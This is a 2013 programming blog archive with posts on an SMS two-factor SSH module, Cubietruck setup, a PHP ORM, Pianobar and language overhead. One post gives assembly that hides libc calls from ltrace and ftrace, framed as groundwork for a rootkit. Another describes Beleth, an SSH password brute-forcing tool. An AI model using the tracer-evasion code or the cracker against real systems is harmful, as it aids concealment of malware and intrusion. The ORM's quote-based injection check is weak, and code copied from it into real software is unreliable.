Monday, December 30, 2013

Simple SSH 2-Factor Authentication Module


I needed a quick 2-factor authentication module for SSH. Instead of going with one of the popular solutions like Duo or Google Authenticator, it seemed like a good excuse to whip up some code. I've written small PAM modules in C in the past, but I've been on a Python kick lately, so I turned to pam-python. The module, which we'll call the SSH Two-factor Authentication Module in Python (STAMP, to make it catchy), is available over on GitHub.

How it Works

STAMP works by generating a one-time-use personal identification number (PIN) for each login attempt. The module then looks up the local user's cell phone number, which we'll be storing in the standard Office Phone slot of the GECOS field in each pw entry in /etc/passwd. Once it has the user's phone number, the module sends the one-time PIN to the user. Instead of storing credentials for a service like Google Voice, I went with one of the first free sites I found, TxtDrop. The source includes a small class for dealing with the TxtDrop SMS form, and it worked with most US carriers that I tried out. Once the correct PIN is entered, the login procedure continues with normal password-based authentication.
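Conceptually, the per-login flow looks something like the sketch below (illustrative Python only; the function names and the GECOS parsing are my assumptions, not the actual STAMP source):

```python
import random

def generate_pin(length=6):
    # One-time numeric PIN, regenerated for every login attempt
    return "".join(random.choice("0123456789") for _ in range(length))

def office_phone(gecos):
    # GECOS is conventionally "Full name,Room,Office Phone,Home Phone";
    # in a real PAM module you'd fetch it with pwd.getpwnam(user).pw_gecos
    fields = gecos.split(",")
    return fields[2] if len(fields) > 2 else None

pin = generate_pin()
phone = office_phone(",,555-555-5555,")  # -> "555-555-5555"
# ...send `pin` to `phone` via the SMS gateway, then compare it against
# what the user types at the "Enter one time PIN:" prompt.
```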

Setting up the Module

Ensure the following dependencies are already installed on your system.

  • pam-python
  • python-requests

Grab the source and copy it to /lib/security:

$ git clone
$ cd stampauth
$ sudo cp /lib/security/

Now that the module is in place, we need to configure sshd to enable challenge/response authentication. In /etc/ssh/sshd_config, make sure the following line is present and uncommented.

ChallengeResponseAuthentication yes

We also need to let PAM know the order in which authentication should be processed. I set it up so that the user is first prompted for the one-time PIN before being prompted for the password. If you choose to go this route, then in /etc/pam.d/sshd locate the section marked with "@include common-auth" and make it look like the entry below.

auth       requisite
@include common-auth

You can set a user's Office Phone number with the following command.

$ sudo usermod stderr -c ',,555-555-5555,'

Finally, restart sshd and test it out.

$ sudo service ssh restart
$ ssh stderr@localhost
Enter one time PIN: 


An attacker could potentially lock you out of your system by repeatedly connecting to your SSH server and failing the PIN test. This is because TxtDrop limits the number of SMSes sent from a given IP; once your server hits that limit, it can no longer deliver PINs for legitimate logins. Feel free to switch to a different SMS gateway.

Saturday, December 7, 2013

Cubietruck: a complete newbie guide


I own a Raspberry Pi and love it, but it just wasn't powerful enough. So I googled around, found the Cubie, and figured it should be more than powerful enough for what I wanted to do. I found out the hard way that the Cubie is not as user friendly as the Raspberry Pi. My biggest gripe is that while there is tons of support out there, it is not as good as the Raspberry Pi community. For instance, I was under the impression I could boot from an SD card just like the Pi, and while I can, what I didn't know is that it has to be a microSD card. Luckily I had an old cell phone with an 8 GB card in it that I could use. The next issue I faced was figuring out exactly how to install the image onto the SD card. In this post I will go over some of the problems I faced with the Cubie and how I was able to overcome them, in hopes that someone else will have good documentation to go off of. I am using the Cubietruck and installing Lubuntu onto an older SanDisk 8 GB microSD card.

Check List:

  • microsd card reader
  • microsd card (at least 2gig)
  • computer running linux
  • cubietruck
  • a way to supply the cubie with power: For this I'm using a 5v/1amp cell phone dc charger with the supplied usb power cord that came with the cubie
  • hdmi cord
  • tv/monitor with hdmi
  • usb wired or wireless keyboard

  • Software: u-boot, bootfs, and rootfs images

  • You will also need dd (usually pre-installed on Linux) to transfer the files.

    Installing the software to boot from microsd

    First thing we'll need to do is find the card, then zero it.
    ls /dev/
    Your card should show up as sdd or sde (mine happened to be sde) depending on the card and the Linux distro you're running. You can run ls on /dev/, note the output, then plug the microSD card in and run it again to compare. Next we need to zero out the card's bootloader area.
    sudo dd if=/dev/zero of=/dev/sde bs=1024 seek=544 count=128
    Next we're going to make the card bootable by writing the u-boot image with dd.
    sudo dd if=/home/user/downloads/u-boot-sunxi-with-spl-ct-20131102.bin of=/dev/sde bs=1024 seek=8
    Now that the card is bootable we need to create partitions to install the operating system to. To accomplish this we'll be using fdisk on the microsd card.
    sudo fdisk /dev/sde
    We need to create two primary partitions:
  • First partition needs to be 64mb in size
  • Second partition needs to fill up the rest of the card
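Inside fdisk, the dialogue for creating those two partitions looks roughly like this (exact prompts vary between fdisk versions; `<Enter>` means accept the default):

```
Command (m for help): n          <- new partition
Select: p                        <- primary
Partition number: 1
First sector: <Enter>
Last sector: +64M                <- the 64 MB boot partition

Command (m for help): n
Select: p
Partition number: 2
First sector: <Enter>
Last sector: <Enter>             <- use the rest of the card

Command (m for help): w          <- write the table and exit
```

You would then format the two partitions and copy the bootfs and rootfs onto them.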

    Basic Configuration on first boot

    Username/Password: linaro/linaro

    Once booted there are a few things you'll want to do. First you'll need to log in; the default user for the OS is linaro, and the password, as you might guess, is also linaro. The next thing you'll notice is that there is no wlan0, only eth0. This is because the modules are not loaded, so let's load the module for Bluetooth and wifi.
    $sudo modprobe bcmdhd
    Now you can configure wpa_supplicant to set up wifi; you might run into some issues with it. Let's reboot now to make sure the configuration stuck. What you'll notice is that, once again, wlan0 is missing. This is because the Bluetooth and wifi module does not load at boot, so let's fix that.
    $sudo modprobe bcmdhd
    $sudo nano /etc/modules
    At the end of /etc/modules you'll need to add bcmdhd so that it will load on boot. Save the file with Ctrl+X and reboot. Now your wireless configuration and the module should both load at boot, and you should have wireless networking. At this point you should update and upgrade your installed packages:
    $sudo apt-get update
    $sudo apt-get upgrade


    I've had the Cubietruck a short time now, and I can say that I do enjoy it and its power over the Pi; however, the community could be better as far as development is concerned. I got the Cubietruck to make XBMC 720p and 1080p playback smoother without having to overclock. I haven't quite configured everything I want yet, so I can't say whether the purchase was worth it for what I wanted the Cubietruck to do. So far it's been a learning curve, and I look forward to finding out what more I can do with it. For now I have a starting point.


    Main Cubieboard Site
    Tools and OS's
    Monday, November 18, 2013

    Binaries and Process Tracing

    A little bit about Linux Programs

    The Linux ABI (Application Binary Interface) is used to bind an executable to its imported functions at runtime, through several functions provided by the libc sysdeps and the dynamic linker/loader (ld.so). For example, when a programmer writes code that contains a call to “printf”, the dynamic linker is responsible for extracting a pointer (in the form of a memory address) from the shared library that provides it, then writing it into the executable's import table so that it can be called from the executable more practically. The program interpreter is a component that can be specified for customized executable formats. All dynamically linked Linux applications have what is called an INTERP header (or .interp section); you can see this using the command line utility readelf, like so:

    user@host $ grep interpreter <(readelf -a $(which ls))
          [Requesting program interpreter: /lib64/]

    Because I am using a 64-bit system for this demonstration, all of the dynamically linked binaries in my testing environment specify /lib64/; on a 32-bit system, executables will specify a 32-bit counterpart.

    A little about process tracing

    Process tracing in a Linux environment can be performed using several different debugging tools, namely strace, ltrace, ftrace, and interactive debuggers (such as gdb). While strace is an excellent tool for monitoring I/O and certain system calls, it falls short when it comes to monitoring shared-object calls. That is why ltrace and ftrace were born: they are able to show the actual function calls as they occur from a process to the shared objects (*.so files) imported by the executable. This allows administrators and programmers trying to debug issues with an application to determine where in its calls to shared objects things begin to go wrong. Process tracing and debuggers can also be helpful for malware analysis and detection. As such, attackers frequently target these utilities looking for evasion methodology, amongst other bugs (debugger exploits, anyone?).

    Self-linking code

    When I wrote the dynamic engine for shellcodecs, I implemented my own version of program interpretation. Why? Because there is no guarantee that a given executable will have required functions in its import table for shellcode to run properly. So, I wrote a piece of assembly code capable of parsing an ELF64 shared object to isolate pointers to the functions I wanted to call, similar to dlsym() from libdl. Recently I was entertaining the idea of writing an all-assembly rootkit, so I checked into how calls made by the shellcodecs engine were handled by different tracing methods. I put together a couple of programs to see how things got handled and what information actually got revealed by tracing the processes. I got some pretty interesting results.
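The dlsym()-style lookup the engine performs by hand is the same service libdl exposes. As a rough point of comparison (not the shellcodecs code itself), Python's ctypes wraps those exact calls:

```python
import ctypes
import ctypes.util

# dlopen() libc, then resolve exported symbols by name at runtime;
# this is the job the shellcodecs engine reimplements in assembly.
libc = ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6")

# The resolved address of puts(), as dlsym() would return it
puts_addr = ctypes.cast(libc.puts, ctypes.c_void_p).value
print(hex(puts_addr))

libc.puts(b"resolved at runtime")
```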

    Test programs and results

    My test programs were relatively simple. Here is a normal C program that prints “ohai” and then calls exit(2):

    #include <stdio.h>
    #include <dlfcn.h>
    #include <stdlib.h>
    int main(void) {
        printf("ohai");
        exit(2);
    }

    And its ltrace output:

    user@host $ ltrace ./ltrace-test
    __libc_start_main(0x400544, 1, 0x7fff70b45d88, 0x400570, 0x400600 <unfinished ...>
    printf("ohai")                                                                               = 4
    exit(2 <no return ...>
    +++ exited (status 2) +++

    Notice the tracer caught the call to printf as well as the call to exit. It shows both exit(2) as well as "exited (status 2)". This is an important distinction for our next test:

    #include <stdio.h>
    #include <dlfcn.h>
    #include <stdlib.h>
    // Compile: gcc ltraced.c -o ltraced -ldl
    int main(void) {
        void *libc;
        int (*putstr)(char *);
        int (*exitp)(int);
        libc = dlopen("/lib/i386-linux-gnu/i686/cmov/",RTLD_LAZY);
        *(void **)&putstr = dlsym(libc,"puts");
        *(void **)&exitp  = dlsym(libc,"exit");
        putstr("ohai");
        exitp(2);
    }

    And its ltrace results:

    user@host $ ltrace ./ltraced
    __libc_start_main(0x400594, 1, 0x7fff36ae94b8, 0x400610, 0x4006a0 <unfinished ...>
    dlopen("/lib/i386-linux-gnu/i686/cmov/li"..., ) = NULL
    dlsym(NULL,"puts")                              = 0x7f400a7e0ce0
    dlsym(NULL,"exit")                              = 0x7f400a7ab970
    +++ exited (status 2) +++

    Notice that this time it only catches the calls to dlopen() and dlsym() -- not the calls to puts() or exit() themselves. The reason: puts() and exit() never appear in the binary's import table, as you can see with the following:

    user@host $ objdump -R ./ltraced
    ./ltraced:     file format elf64-x86-64
    OFFSET           TYPE              VALUE 
    0000000000600fe0 R_X86_64_GLOB_DAT  __gmon_start__
    0000000000601000 R_X86_64_JUMP_SLOT  __libc_start_main
    0000000000601008 R_X86_64_JUMP_SLOT  dlopen
    0000000000601010 R_X86_64_JUMP_SLOT  dlsym

    Implications and further testing

    Since I realized ltrace was only capable of tracing functions in the executable's import table, I wondered if it's possible to completely evade ltrace for called functions with an assembly application. The results were phenomenal.

    user@host $ ltrace ./full_import_test 
    __libc_start_main(0x400554, 1, 0x7fff92666938, 0x400690, 0x400720Successfully called puts without import
    +++ exited (status 2) +++

    I was able to get these results with the following assembly program:

    .global main
    .section .data
    .section .bss
    # gcc full_import_test.s -ldl -Wl,-z,relro,-z,now -o full_import_test
        .align 8
    libdl_base: .skip 8
        .align 8
    libc_base:  .skip 8
    .section .text
    main:
      xor %rdi, %rdi
      mov $0x400130, %rbx
      mov (%rbx), %rcx
      add 0x10(%rbx), %rcx
      mov 0x20(%rcx, %rdi, 2), %rbx     # grab pointer to dlclose()
    find_base:
      dec %rbx
      cmpl $0x464c457f, (%rbx)          # grab base of libdl
    jne find_base
      mov $libdl_base, %rdi
      mov %rbx, (%rdi)
      xor %rdi, %rdi
      push $0x25764b07       # Function hash for dlopen()
      pop %rbp              
      mov $libc, %rdi        #
      push $0x01             
      pop %rsi               # RTLD_LAZY
      call invoke_function   # (%rax) = dlopen('',RTLD_LAZY);
      mov (%rax), %rcx
      mov $libc_base, %rax
      mov %rcx, (%rax)
    jmp _world
    #  Takes a function hash in %rbp and base pointer in %rbx
    #  >Parses the dynamic section headers of the ELF64 image
    #  >Uses ROP to invoke the function on the way back to the
    #  -normal return location
    #  Returns results of function to invoke.
    invoke_function:
      push %rbp
      push %rbp
      push %rdx
      xor %rdx, %rdx
      push %rdi
      push %rax
      push %rbx      
      push %rsi
      push %rbp
      pop %rdi
        push %rbx
        pop %rbp
       push $0x4c
       pop %rax
       add (%rbx, %rax, 4), %rbx
    check_dynamic_type:
        add $0x10, %rbx
        cmpb $0x5, (%rbx)
      jne check_dynamic_type
        mov 0x8(%rbx), %rax       # %rax is now location of dynamic string table
        mov 0x18(%rbx), %rbx      # %rbx is now a pointer to the symbol table.
    check_next_hash:
        add $0x18, %rbx
        push %rdx
        pop %rsi
        xorw (%rbx), %si
        add %rax, %rsi
          push %rax
          push %rdx
            push %rdx
            pop %rax
          calc_hash_loop:
            lodsb
              rol $0xc, %edx
              add %eax, %edx
              test %al, %al
              jnz calc_hash_loop
            push %rdx
            pop %rsi
          pop %rdx 
          pop %rax
      cmp %esi, %edi
      jne check_next_hash
        add 0x8(%rbx,%rdx,4), %rbp
        mov %rbp, 0x30(%rsp)
        pop %rsi
        pop %rbx
        pop %rax
        pop %rdi
        pop %rdx
        pop %rbp
    # push hashes_array_index
    # call fast_invoke
    fast_invoke:
      push %rbp
      push %rbx
      push %rcx
      mov 0x20(%rsp), %ecx
      mov $libc_base, %rax
      mov (%rax), %rbx
      mov $hashes, %rax
      mov (%rax, %rcx, 4), %ebp
      # Registers required for link to work:
      # rbp - function hash
      # rbx - base pointer to lib
      call invoke_function
      mov 0x18(%rsp), %rcx # grab retptr
      mov %rcx, 0x20(%rsp) # kill the function argument
      pop %rcx
      pop %rbx
      pop %rbp
      add $0x8, %rsp
    # freed developer registers: 
    # rax rbp rbx rcx r11 r12 r13 r14 r15
    # a libc call:
    # function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)
    _world:
      mov $hiddenmsg, %rdi  # arg1
      push $0x1             # function array index in hashes label for puts()
      call fast_invoke      # puts("Successfully called puts without import")
      push $0x02            #
      pop %rdi              # arg1
      push $0x00            # array index in hashes label for exit()
      call fast_invoke      # exit(2);
      ret                   # Exit normally from libc, exit(0)
      #  after execution, echo $? shows 2 and not 0 ;)
    force_import:
        call dlclose
    libc:
        .asciz ""
    hashes:
        .long 0x696c4780, 0x74773750    # hashes for exit() and puts()
    hiddenmsg:
        .asciz "Successfully called puts without import"

    And its import table does not contain dlopen(), puts(), or exit():

    user@host $ objdump -R full_import_test
    full_import_test:     file format elf64-x86-64
    OFFSET           TYPE              VALUE 
    0000000000600ff8 R_X86_64_GLOB_DAT  __gmon_start__
    0000000000600fe8 R_X86_64_JUMP_SLOT  __libc_start_main
    0000000000600ff0 R_X86_64_JUMP_SLOT  dlclose

    In this example, we call dlopen() on libc, then use the shellcodecs implementation of dlsym() to call functions. The tricky bit was getting dlopen() to work without showing up in the ltrace call. For this, I ended up putting a "call dlclose" at the end of the application in the force_import label (though it is never actually called or used). By compiling with full relro, I was able to use the pointer to dlclose from the GOT as a way to pivot back to the base of libdl, then re-parse its export table to traverse back to dlopen(). As a result, none of the shared objects opened by dlopen are noticed by ltrace or ftrace. Depending on your runtime environment and your compiler, the offset may be subject to change. The following line is responsible for extracting the dlclose pointer:

      mov 0x20(%rcx, %rdi, 2), %rbx     # grab pointer to dlclose()

    If for some reason this code isn't working on your system, you can probably achieve the desired result by modifying the offset from 0x20 to either 0x18 or 0x28; it is a static offset assigned at compile time. We could also iterate over the string table to make sure we really are grabbing the pointer to dlclose, but that was not the purpose of these tests. So when it comes to binaries like this, strace is (for now) the only non-interactive tracing option available, and it won't show you some of those shared-object calls that might be vital to your research.
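The function hashes embedded in the program (0x25764b07 for dlopen(), and the 0x696c4780/0x74773750 pair for exit() and puts()) come from a simple rotate-and-add hash over the symbol name, including its terminating NUL, as the rol $0xc/add sequence in the calc_hash loop suggests. A Python reimplementation:

```python
def sym_hash(name):
    # Rotate the 32-bit accumulator left by 12, then add each byte of
    # the symbol name, including the trailing NUL terminator.
    h = 0
    for b in name.encode() + b"\x00":
        h = ((h << 12) | (h >> 20)) & 0xFFFFFFFF  # rol $0xc
        h = (h + b) & 0xFFFFFFFF                  # add the byte
    return h

print(hex(sym_hash("dlopen")))  # 0x25764b07, the constant pushed for dlopen()
```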

    Saturday, November 9, 2013

    Development notes from Beleth: Multi-threaded SSH Password Auditor


    Beleth is a fast multi-threaded SSH password auditing tool. For a quick introduction to the tool and how to use it, head over to Blackhat Library.

    Get the source

    Beleth is available on github and will continue to be updated with new features. If you'd like in on the development, submit a pull request.

    $ git clone
    $ cd beleth
    $ make

    Multi-threaded design

    There are a couple of options available to developers when designing multi-threaded software in C on Linux based systems. Two of the most popular are fork() and pthread_create(). fork() differs from pthread_create() in that address space is not shared between the parent and the child; instead, the child process gets its own copy of the parent's address space, code, and stack. In order to keep dependencies to a minimum, I decided to go with a standard fork() design.

    pid = fork();
    if (pid < 0) {
        fprintf(stderr, "[!] Couldn't fork!\n");
    } else if (pid == 0) { /* Child process */
        if (ptr != NULL) {
            /* ... run the cracking loop ... */
        }
    } else {               /* Parent process */
        /* ... task handler records the child and moves on ... */
    }

    This is great, but we need a way to control the child processes that are running through the password list.

    Inter-process Communication (IPC)

    Again, there are many options for developers when it comes to IPC as well. Below is a list of only some of the available options.

    • Shared Memory
    • FIFOs
    • Half-Duplex Pipes
    • Full-Duplex Pipes
    • Sockets

    We are using fork() so memory sharing is not an immediate option, unless we feel like mmap()ing a shared memory space for communication, but that can get messy. FIFOs and pipes would work for distributing the wordlist among threads, but in order to keep options open Beleth uses Unix Domain Sockets for all IPC. By designing IPC with sockets, it would be trivial to turn Beleth into a distributed cracking platform.

    The task handling process binds to a socket file

    int listen_sock(int backlog) {
        struct sockaddr_un addr;
        int fd, optval = 1;
        if ((fd = socket(AF_UNIX, SOCK_STREAM, 0)) == -1) {
            if (verbose >= VERBOSE_DEBUG)
                fprintf(stderr, "[!] Error setting up UNIX socket\n");
            return -1;
        }
        fcntl(fd, F_SETFL, O_NONBLOCK); /* Set socket to non-blocking */
        setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(int));
        memset(&addr, 0, sizeof(addr)); /* Zero the address before use */
        addr.sun_family = AF_UNIX;
        strncpy(addr.sun_path, sock_file, sizeof(addr.sun_path)-1);
        if (bind(fd, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
            if (verbose >= VERBOSE_DEBUG)
                fprintf(stderr, "[!] Error binding to UNIX socket\n");
            return -1;
        }
        if (listen(fd, backlog) == -1) {
            if (verbose >= VERBOSE_DEBUG)
                fprintf(stderr, "[!] Error listening to UNIX socket\n");
            return -1;
        }
        return fd;
    }

    Each cracking thread establishes a connection to the socket file in order to request the next password in the list, as well as tell the task handler when a correct password is found.

    int connect_sock(void) {
        int fd;
        struct sockaddr_un addr;
        if ((fd = socket(AF_UNIX, SOCK_STREAM, 0)) == -1) {
            if (verbose >= VERBOSE_DEBUG)
                fprintf(stderr, "[!] Error creating UNIX socket\n");
            return -1;
        }
        memset(&addr, 0, sizeof(addr)); /* Zero the address before use */
        addr.sun_family = AF_UNIX;
        strncpy(addr.sun_path, sock_file, sizeof(addr.sun_path)-1);
        if (connect(fd, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
            if (verbose >= VERBOSE_DEBUG)
                fprintf(stderr, "[!] Error connecting to UNIX socket\n");
            return -1;
        }
        return fd;
    }

    The protocol is simple and based on the following definitions located in beleth.h.

    /* IPC Protocol Header Information */
    #define REQ_PW   0x01 /* Request new password to try */
    #define FND_PW   0x02 /* Found password */
    #define NO_PW    0x03 /* No PWs left... cleanup */
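To make the exchange concrete, here is a toy sketch of a single request/response round in Python (the opcode values come from beleth.h; the password and variable names are made up, and a socketpair() stands in for the socket file):

```python
import socket

# Opcodes from beleth.h
REQ_PW = b"\x01"  # request a new password to try
FND_PW = b"\x02"  # report a found password
NO_PW  = b"\x03"  # no passwords left

# `handler` plays the task handler, `worker` plays a cracking thread
handler, worker = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

worker.sendall(REQ_PW)             # worker: send me the next candidate
op = handler.recv(1)               # handler reads the opcode...
if op == REQ_PW:
    handler.sendall(b"hunter2\n")  # ...and replies with the next password

pw = worker.recv(64)
print(pw)
```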

    To-do list

    • Add option for user name list
    • Add option for host list
    • Add simple port scanner and feed new IPs to the task handler
    • Add distributed cracking support

    Wednesday, November 6, 2013

    Local testing for executable overhead

    The other day a friend of mine and I were discussing the different kinds of overhead involved with different programming languages, and I used some simple comparisons to explain that compiled languages have lower overhead than interpreted languages. While it does not directly correlate to RAM or processor usage (that varies with the developer's code), it can give you a general idea of the overall efficiency of a language's implementation. We'll be comparing the disk usage and running time of a simple program, exit(0), written in a variety of languages.


    This is a very basic implementation of exit() using a linux system call.

    .section .data
    .section .text
    .globl _start
    _start:
        xor %rdi, %rdi    # exit status = 0
        push $0x3c
        popq %rax         # syscall number 60: exit
        syscall

    I saved the file as exit.s and assembled/linked it with the following commands:

    $ as exit.s -o exit.o
    $ ld exit.o -o exit


    This is a very quick version of exit.c:

    #include <stdio.h>
    #include <stdlib.h>
    int main(int argc, char **argv) {
        exit(0);
    }

    I compiled this using the following:

    $ gcc exit.c -o exit-c

    Perl is only 2 lines in length:

    #!/usr/bin/perl
    exit(0);
    I packed this into a standalone executable using PAR Packer (pp), assuming the script is saved as exit.pl:

    $ pp -o exit-pl exit.pl

    Simple comparisons

    Disk usage reveals:

    $ du -sh exit exit-c exit-pl
    4.0K exit
    12K exit-c
    2.4M exit-pl

    That test includes slack space in its results. Let's find out what the actual byte counts of these files are, shall we?

    $ wc -c exit exit-c exit-pl
        664 exit
       8326 exit-c
    2474525 exit-pl
    2483515 total
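The gap between the two tests is easy to demonstrate; a small Python sketch (any scratch file will do):

```python
import os
import tempfile

# Write a 1-byte file: its apparent size (what wc -c counts) is 1 byte,
# but the filesystem still allocates whole blocks for it, and that
# slack space is what du reports.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"x")
    path = f.name

st = os.stat(path)
print(st.st_size)          # apparent size in bytes (wc -c)
print(st.st_blocks * 512)  # allocated size (roughly what du shows)
os.unlink(path)
```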

    A timing test will show us:

    $ time ./exit
    real 0m0.001s
    user 0m0.000s
    sys  0m0.000s
    $ time ./exit-c
    real 0m0.002s
    user 0m0.000s
    sys  0m0.000s
    $ time ./exit-pl
    real 0m0.187s
    user 0m0.100s
    sys  0m0.020s


    Since the Perl example is packed with PAR Packer, it might not be a fair comparison for a script. We can time it, along with Ruby, Python, and PHP, while being run by their interpreters:

    $ time perl -e 'exit(0);'
    real 0m0.005s
    user 0m0.000s
    sys 0m0.004s
    $ time ruby -e 'exit'
    real 0m0.008s
    user 0m0.004s
    sys 0m0.004s
    $ time python -c 'exit'
    real 0m0.024s
    user 0m0.016s
    sys 0m0.008s
    $ time php -r 'exit(0);'
    real 0m0.017s
    user 0m0.008s
    sys 0m0.008s

    These timing tests can be used as a baseline indicator of the general performance of a given language. With assembly in the lead and C not far behind, it's easy to see that truly compiled or assembled languages are in fact faster than interpreted ones. These aren't perfectly fair comparisons, for several reasons:

    • Unused compiler/interpreter functionality overhead is included regardless of whether or not we use it in our code
    • Other processes running on the test system may cause things like timing to be unreliable (real cycle counting is much more reliable)
    • Actual CPU/Ram usage was never measured

    Even though it isn't perfect, this should give you some idea of the difference in overhead and performance between the given interpreters on the test system, and it certainly shows that, in general, compiled or assembled languages run more quickly than interpreted ones. Of course, the performance of any application is partly due to its programming; so while this may give you an idea of a language's performance, it won't tell you how well any particular application written in that language is going to run.

    Saturday, November 2, 2013

    PHP Database Programming: Introducing 'ormclass'

    To begin with, I have a few problems with the traditional web stack. Suppose I wanted to write a feature-rich, user-friendly web application -- this requires that I know at least five programming languages:

    • HTML
    • CSS
    • JavaScript
    • PHP (or another server-side language)
    • SQL

    It doesn't seem right that we need five languages for a single application; but that aside, the fact that SQL injection is still one of the top ten reasons anything gets compromised is pathetic. It is 2013; SQL injection shouldn't really exist anymore. SQL programming can also be a bit cumbersome, for multiple reasons. Enter the ORM. ORMs are designed for two purposes: making SQL data more easily accessible to a programmer from their chosen programming language, and improving overall application security. The problem I have with most ORMs is simple: I still find myself writing some form of SQL-like statements, even if it isn't traditional SQL itself. For example, in PHP's Doctrine ORM, if I wanted to select an article by id 1, the syntax would look something like:

       $article = Doctrine_Query::Create()->select('*')->from('article')->where('id=?')->execute($id)->fetchOne();

    The syntax may have changed since I last used Doctrine, but you can see there is still a lot of SQL-like code going on (even if it's not direct SQL itself). In this case I have to ask: why didn't we just use the MySQL PDO library? At this point we've added a lot of extra bloat to the application in the form of the Doctrine ORM, yet we still find ourselves writing SQL (or something similar). For all of that code and RAM consumption, that's not much of an improvement for a developer who just wants to hack out a quick application.

    So, I've made my own quick and dirty ORM (available on GitHub). It automatically handles sanitizing for the developer, as well as the object mapping itself. Of course, this isn't the best ORM in the world (and I will never make that claim), but it certainly helps for getting some code out quickly and effectively. It's also very tiny. Many improvements can be made to its design, and I will continue to develop it off and on as needed for my own applications. The purpose is to effectively eliminate the need to write SQL during (simple) application development.

    The ormclass needs a configuration file to be included before it. The configuration is expected to look like:

        $dbhost   = 'localhost';  //Database server hostname
        $database = '';           //Database name
        $dbuser   = '';           //Database username
        $dbpass   = '';           //Database password
        $dbl      = @mysql_connect($dbhost,$dbuser,$dbpass);
        @mysql_select_db($database,$dbl) or die("I'm not configured properly!");

    Obviously, you'll have to fill those values in for yourself. I wanted an ORM that would let me do something like the following:

        $article  = new article($_GET['id']);
        # or 
        $article  = new article($_GET['title']);
        # or
        $articles = new article($array_of_ids);
        # or 
        $articles = new article($array_of_titles);
        # or 
        $articles = new article($nested_mixed_array_of_titles_and_ids);    

    I also wanted to be able to simply assign properties to the object and save and delete it, or even create new objects. This would also need the capacity for searches, both exact and wildcard. This would (mostly) eliminate the need for writing actual SQL in my application, and also handle some of the tedium of sanitizing for me. Again, I'm aware that this can certainly be done better, and if you'd like to contribute to the project, submit a pull request on GitHub. This is a quick and dirty implementation of such an ORM, one that allows the programmer some leeway to write logical code instead of tedious code. There are definitely some places that need work. I've hacked out a version that uses the traditional MySQL library, and I'm working on a version that uses the MySQL PDO library.

    The methods and features included in the library include a few subsets of SQL query tedium removal. The following methods are inherited by all classes extending the ORM's class:

    • __construct($arg = null)
    • search($property,$string,$limit = 10, $offset = 0)
    • search_exact($property,$value, $limit = 10, $offset = 0)
    • unsafe_attr($field,$value)
    • fetchAll()
    • fetchRecent($limit = 10)
    • delete()
    • save()

    The constructor will automatically check whether a method called construct() exists in its child class. If so, it will invoke that function after it has preloaded all of the relevant data into the object. This is how relations can be maintained. It's a bit hackier than most ORMs (there's no configuration file in which you simply declare the relations), but it gets the job done and gives the programmer control over whether relations are followed and child objects are created by default. The ORM requires that every table have an 'id' column; the 'name' column is optional. Here is an example relation:

        class article extends ormclass {
            function construct() {
                $this->author = new author($this->author_id);
            }
        }

    In this example, you could later do:

         $article = new article($id);
         echo $article->author->name; # or any other author property

    When you want to create a new record, you can simply pass '0' as the ID for the object, and it will automatically have an ID on instantiation:

        $article = new article(0);

    Alternatively, it's possible to just call save() after a null instantiation (you'd do this if you don't need the object to have an ID for relation purposes before it has attributes):

        $article = new article();

    Similarly to the constructor hook for construct(), there is also a hook for creation of a new record. If you wanted to do something when a new object is inserted into the database, you could add a function called creation() to the class, and it would be called any time a new record is created in the database.

    The difference between unsafe_attr() and save() is relatively simple. If HTML is allowed in a field, for example $article->body, then you'd want to use unsafe_attr() to save that particular field (save() will auto-sanitize against XSS). When using unsafe_attr(), because this uses the normal MySQL library (and not PDO), you will need to make sure that your HTML contains exclusively single quotes or exclusively double quotes; it doesn't particularly matter which. The function checks that you aren't using both, to prevent SQL injection, and returns false if both are in use. This bug is the primary reason I'm developing a PDO version separately (besides standards, we can't forget those).

    This ORM also has a performance/feature trade-off. Because I wanted it to be able to handle nested arrays, the collection function runs an arbitrarily large number of SQL queries. I can provide a version that doesn't do this (but will also be unable to handle nested arrays) on request, since I'm sure people will not want the performance hit; however, because I am working on a PDO version, I'd rather make collection handling a loader option in that rendition. This also currently only auto-sanitizes strings and integers; better sanitizing will come in the PDO version (hence my describing this as "Quick and Dirty").
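For illustration only (the real check lives in the PHP unsafe_attr() method; this Python sketch is my paraphrase of the rule, not its source), the quote restriction boils down to:

```python
def quotes_ok(value):
    # A value may contain single quotes or double quotes, but not both;
    # mixing them is rejected to prevent breaking out of SQL quoting.
    return not ("'" in value and '"' in value)

print(quotes_ok("<p class='x'>fine</p>"))   # True
print(quotes_ok('<p class="x">fine</p>'))   # True
print(quotes_ok('<a href="x">don\'t</a>'))  # False: both quote styles
```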

    This ORM does not have any scaffolding. This means that you will have to create the database and the associated tables yourself before this ORM can access the data. It does not auto-generate tables or class files. If you have an existing database and you'd like to auto-generate the class files, something like the following line of bash should suffice:

    mysql dbname -e 'show tables'|grep -v dbname|awk '{print "<?php\nclass "$0" extends ormclass {\n\n}\n?>"}' > objects.php

    In closing, the point of this was simply to prove that SQL statements can be eliminated from high-level code entirely, and to provide an easily accessible API. The PDO version should be able to handle a few more complex tasks, like table scans and complex joins that create meta-objects from multiple tables. I also plan to extend compatibility to PostgreSQL and perhaps even port this to additional programming languages. At any rate, please enjoy your newfound ability to kick back and lazily write database-powered applications. Happy hacking.

    Monday, October 21, 2013



    In this post I'm going to go over Pianobar, an awesome open-source console-based client for Pandora Radio. We'll grab the latest source, compile it, set it up, and run it.

    Step One:

    First we'll need to install git so we can grab the latest source from github. We're building from git so we have the latest code; otherwise we could simply install pianobar from the repositories. Jump to your terminal and run:
    $ sudo apt-get install git

    Step Two:

    We need to get the latest source of pianobar. So in the terminal again type the following
    $ git clone

    Step Three:

    We need to install the dependencies for pianobar to work correctly. Again, in your terminal, type the following:
    $ sudo apt-get install libao-dev libmad0-dev libfaad-dev libgnutls-dev libjson0-dev libgcrypt11-dev

    Step Four:

    Now all we need to do is compile and install the source we cloned earlier. From the directory where you ran git, `cd` into the pianobar directory and run:
    $ cd pianobar
    $ make
    $ sudo make install

    Step Five:

    At this point pianobar should be installed, assuming we didn't hit any errors along the way. The next step is to add information to the config file in your home directory. Pianobar should have a directory within .config; if not, create it.
    $ cat ~/.config/pianobar/config
    We'll need to add some information to the config file in order to make pianobar work correctly. If there is no config file in the pianobar directory, create a blank text file named 'config'.
